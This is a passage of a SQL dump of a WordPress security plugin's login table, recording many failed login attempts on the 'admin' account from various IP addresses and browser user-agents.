(102050, 1498340142.400456, 1, 'loginFailValidUsername', 'admin', 1, 3174000914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102051, 1498340143.955250, 1, 'loginFailValidUsername', 'admin', 1, 3174000914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102052, 1498340550.113277, 1, 'loginFailValidUsername', 'admin', 1, 3185558189, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102053, 1498342801.874577, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102054, 1498348106.217769, 1, 'loginFailValidUsername', 'admin', 1, 2390016735, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102055, 1498348801.838211, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102056, 1498350094.075770, 1, 'loginFailValidUsername', 'admin', 1, 1354011537, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102057, 1498350919.946295, 1, 'loginFailValidUsername', 'admin', 1, 1581398262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102058, 1498355372.980326, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102059, 1498358084.228263, 1, 'loginFailValidUsername', 'admin', 1, 1391229745, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102060, 1498358085.384863, 1, 'loginFailValidUsername', 'admin', 1, 1391229745, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102061, 1498362315.088163, 1, 'loginFailValidUsername', 'admin', 1, 830516292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102062, 1498362623.945221, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102063, 1498364348.916096, 1, 'loginFailValidUsername', 'admin', 1, 3192869794, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102064, 1498364350.269135, 1, 'loginFailValidUsername', 'admin', 1, 3192869794, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102065, 1498368497.082926, 1, 'loginFailValidUsername', 'admin', 1, 1092327198, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102066, 1498369871.213092, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102067, 1498372274.822949, 1, 'loginFailValidUsername', 'admin', 1, 3411540890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102068, 1498372276.458533, 1, 'loginFailValidUsername', 'admin', 1, 3411540890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102069, 1498372543.145270, 1, 'loginFailValidUsername', 'admin', 1, 1519446478, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102070, 1498372544.213921, 1, 'loginFailValidUsername', 'admin', 1, 1519446478, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102071, 1498373563.690077, 1, 'loginFailValidUsername', 'admin', 1, 1461532200, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102072, 1498373564.801463, 1, 'loginFailValidUsername', 'admin', 1, 1461532200, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102073, 1498377155.119957, 1, 'loginFailValidUsername', 'admin', 1, 1549067217, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102074, 1498377308.963039, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102075, 1498377660.440700, 1, 'loginFailValidUsername', 'admin', 1, 1933737899, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102076, 1498377662.073791, 1, 'loginFailValidUsername', 'admin', 1, 1933737899, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102077, 1498383988.769811, 1, 'loginFailValidUsername', 'admin', 1, 1530341882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102078, 1498385029.603638, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102079, 1498388809.169085, 1, 'loginFailValidUsername', 'admin', 1, 1241418658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102080, 1498388811.158190, 1, 'loginFailValidUsername', 'admin', 1, 1241418658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102081, 1498389387.231976, 1, 'loginFailValidUsername', 'admin', 1, 1566014399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102082, 1498389388.276862, 1, 'loginFailValidUsername', 'admin', 1, 1566014399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102083, 1498392561.760232, 1, 'loginFailValidUsername', 'admin', 1, 1315727755, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102084, 1498393308.727569, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102085, 1498394814.889550, 1, 'loginFailValidUsername', 'admin', 1, 2966543401, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102086, 1498394816.456028, 1, 'loginFailValidUsername', 'admin', 1, 2966543401, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102087, 1498395875.210886, 1, 'loginFailValidUsername', 'admin', 1, 1303385686, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102088, 1498395876.555470, 1, 'loginFailValidUsername', 'admin', 1, 1303385686, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102089, 1498401373.165791, 1, 'loginFailValidUsername', 'admin', 1, 657073663, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102090, 1498401377.080770, 1, 'loginFailValidUsername', 'admin', 1, 657073663, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102091, 1498401525.564155, 1, 'loginFailValidUsername', 'admin', 1, 1329113047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102092, 1498401526.825140, 1, 'loginFailValidUsername', 'admin', 1, 1329113047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102093, 1498401789.344461, 1, 'loginFailValidUsername', 'admin', 1, 1744435633, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102094, 1498401790.572608, 1, 'loginFailValidUsername', 'admin', 1, 1744435633, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102095, 1498402631.762053, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102096, 1498404391.222234, 1, 'loginFailValidUsername', 'admin', 1, 1422259166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102097, 1498404392.199868, 1, 'loginFailValidUsername', 'admin', 1, 1422259166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102098, 1498406400.294121, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(102099, 1498406400.622209, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102100, 1498406400.930388, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102101, 1498406401.253950, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102102, 1498406401.569914, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102103, 1498406401.883783, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102104, 1498406402.193443, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102105, 1498406402.500756, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102106, 1498406402.810403, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102107, 1498406403.129799, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102108, 1498406403.440621, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102109, 1498406403.748383, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102110, 1498406404.058886, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102111, 1498406404.368091, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102112, 1498406404.680730, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102113, 1498406404.997048, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102114, 1498406405.306683, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102115, 1498406405.614241, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102116, 1498406405.921263, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102117, 1498406687.928450, 1, 'loginFailValidUsername', 'admin', 1, 1460179053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102118, 1498406688.934697, 1, 'loginFailValidUsername', 'admin', 1, 1460179053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102119, 1498407283.448380, 1, 'loginFailValidUsername', 'admin', 1, 95219703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102120, 1498407284.765373, 1, 'loginFailValidUsername', 'admin', 1, 95219703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102121, 1498408310.175878, 1, 'loginFailValidUsername', 'admin', 1, 1332972736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102122, 1498409675.261536, 1, 'loginFailValidUsername', 'admin', 1, 1176434257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102123, 1498409676.425670, 1, 'loginFailValidUsername', 'admin', 1, 1176434257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102124, 1498411046.562574, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102125, 1498411402.341250, 1, 'loginFailValidUsername', 'admin', 1, 87064144, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102126, 1498411403.638121, 1, 'loginFailValidUsername', 'admin', 1, 87064144, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102127, 1498411593.284562, 1, 'loginFailValidUsername', 'admin', 1, 3075663157, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102128, 1498411594.500297, 1, 'loginFailValidUsername', 'admin', 1, 3075663157, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102129, 1498412516.780270, 1, 'loginFailValidUsername', 'admin', 1, 1504019374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102130, 1498413084.279455, 1, 'loginFailValidUsername', 'admin', 1, 3127517827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102131, 1498414106.661850, 1, 'loginFailValidUsername', 'admin', 1, 3000802076, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102132, 1498414108.109414, 1, 'loginFailValidUsername', 'admin', 1, 3000802076, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102133, 1498415662.838049, 1, 'loginFailValidUsername', 'admin', 1, 1458347419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102134, 1498415663.832427, 1, 'loginFailValidUsername', 'admin', 1, 1458347419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102135, 1498415976.289800, 1, 'loginFailValidUsername', 'admin', 1, 1127030815, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102136, 1498417603.333859, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102137, 1498417769.175561, 1, 'loginFailValidUsername', 'admin', 1, 1393206065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102138, 1498417770.239064, 1, 'loginFailValidUsername', 'admin', 1, 1393206065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102139, 1498417878.946215, 1, 'loginFailValidUsername', 'admin', 1, 1276182236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102140, 1498417880.094962, 1, 'loginFailValidUsername', 'admin', 1, 1276182236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102141, 1498419903.296132, 1, 'loginFailValidUsername', 'admin', 1, 759219118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102142, 1498420669.470220, 1, 'loginFailValidUsername', 'admin', 1, 3212005169, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102143, 1498420670.899700, 1, 'loginFailValidUsername', 'admin', 1, 3212005169, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102144, 1498423493.511204, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102145, 1498424503.254493, 1, 'loginFailValidUsername', 'admin', 1, 622414627, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102146, 1498424504.246884, 1, 'loginFailValidUsername', 'admin', 1, 622414627, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102147, 1498429152.086723, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102148, 1498429980.050358, 1, 'loginFailValidUsername', 'admin', 1, 1484276859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102149, 1498433961.436861, 1, 'loginFailValidUsername', 'admin', 1, 1348626918, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102150, 1498434923.980242, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102151, 1498436983.551828, 1, 'loginFailValidUsername', 'admin', 1, 2042128290, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102152, 1498440301.394093, 1, 'loginFailValidUsername', 'admin', 1, 2038480649, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102153, 1498440303.092167, 1, 'loginFailValidUsername', 'admin', 1, 2038480649, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102154, 1498446382.148072, 1, 'loginFailValidUsername', 'admin', 1, 2818125773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102155, 1498446384.251963, 1, 'loginFailValidUsername', 'admin', 1, 2818125773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102156, 1498453858.194492, 1, 'loginFailValidUsername', 'admin', 1, 2637301790, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102157, 1498453859.495400, 1, 'loginFailValidUsername', 'admin', 1, 2637301790, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102158, 1498454826.000827, 1, 'loginFailValidUsername', 'admin', 1, 2197852166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102159, 1498454827.390536, 1, 'loginFailValidUsername', 'admin', 1, 2197852166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102160, 1498455441.164093, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102161, 1498462773.037877, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102162, 1498464276.058464, 1, 'loginFailValidUsername', 'admin', 1, 2994790691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102163, 1498464277.238497, 1, 'loginFailValidUsername', 'admin', 1, 2994790691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102164, 1498465903.211928, 1, 'loginFailValidUsername', 'admin', 1, 717868642, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102165, 1498465904.516020, 1, 'loginFailValidUsername', 'admin', 1, 717868642, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102166, 1498466958.626881, 1, 'loginFailValidUsername', 'admin', 1, 792045249, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102167, 1498468132.948212, 1, 'loginFailValidUsername', 'admin', 1, 1976968246, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102168, 1498468135.261592, 1, 'loginFailValidUsername', 'admin', 1, 1976968246, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102169, 1498468693.932738, 1, 'loginFailValidUsername', 'admin', 1, 1308079525, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224'),
(102170, 1498469977.759742, 1, 'loginFailValidUsername', 'admin', 1, 1609389519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102171, 1498469979.676956, 1, 'loginFailValidUsername', 'admin', 1, 1609389519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102172, 1498470698.113354, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102173, 1498471538.878021, 1, 'loginFailValidUsername', 'admin', 1, 3373558060, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102174, 1498471540.174466, 1, 'loginFailValidUsername', 'admin', 1, 3373558060, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102175, 1498473132.118204, 1, 'loginFailValidUsername', 'admin', 1, 1327704679, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102176, 1498477987.191233, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102177, 1498478043.841939, 1, 'loginFailValidUsername', 'admin', 1, 3236228209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102178, 1498478045.262751, 1, 'loginFailValidUsername', 'admin', 1, 3236228209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102179, 1498478642.120964, 1, 'loginFailValidUsername', 'admin', 1, 627626064, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102180, 1498478643.277050, 1, 'loginFailValidUsername', 'admin', 1, 627626064, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102181, 1498481058.106913, 1, 'loginFailValidUsername', 'admin', 1, 1315218080, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102182, 1498481059.308700, 1, 'loginFailValidUsername', 'admin', 1, 1315218080, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102183, 1498481622.266762, 1, 'loginFailValidUsername', 'admin', 1, 3194233571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102184, 1498481626.381727, 1, 'loginFailValidUsername', 'admin', 1, 3194233571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102185, 1498481654.274335, 1, 'loginFailValidUsername', 'admin', 1, 1733134504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102186, 1498481655.534595, 1, 'loginFailValidUsername', 'admin', 1, 1733134504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102187, 1498483774.527152, 1, 'loginFailValidUsername', 'admin', 1, 1768401889, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102188, 1498483775.625353, 1, 'loginFailValidUsername', 'admin', 1, 1768401889, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102189, 1498485910.306382, 1, 'loginFailValidUsername', 'admin', 1, 1348615251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102190, 1498485911.479771, 1, 'loginFailValidUsername', 'admin', 1, 1348615251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102191, 1498486556.968755, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102192, 1498487358.008650, 1, 'loginFailValidUsername', 'admin', 1, 2058414788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102193, 1498487359.380609, 1, 'loginFailValidUsername', 'admin', 1, 2058414788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102194, 1498487653.425575, 1, 'loginFailValidUsername', 'admin', 1, 1781745196, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102195, 1498487654.717545, 1, 'loginFailValidUsername', 'admin', 1, 1781745196, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102196, 1498489606.466936, 1, 'loginFailValidUsername', 'admin', 1, 2631890677, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102197, 1498489607.724640, 1, 'loginFailValidUsername', 'admin', 1, 2631890677, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102198, 1498491193.830080, 1, 'loginFailValidUsername', 'admin', 1, 3075677919, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
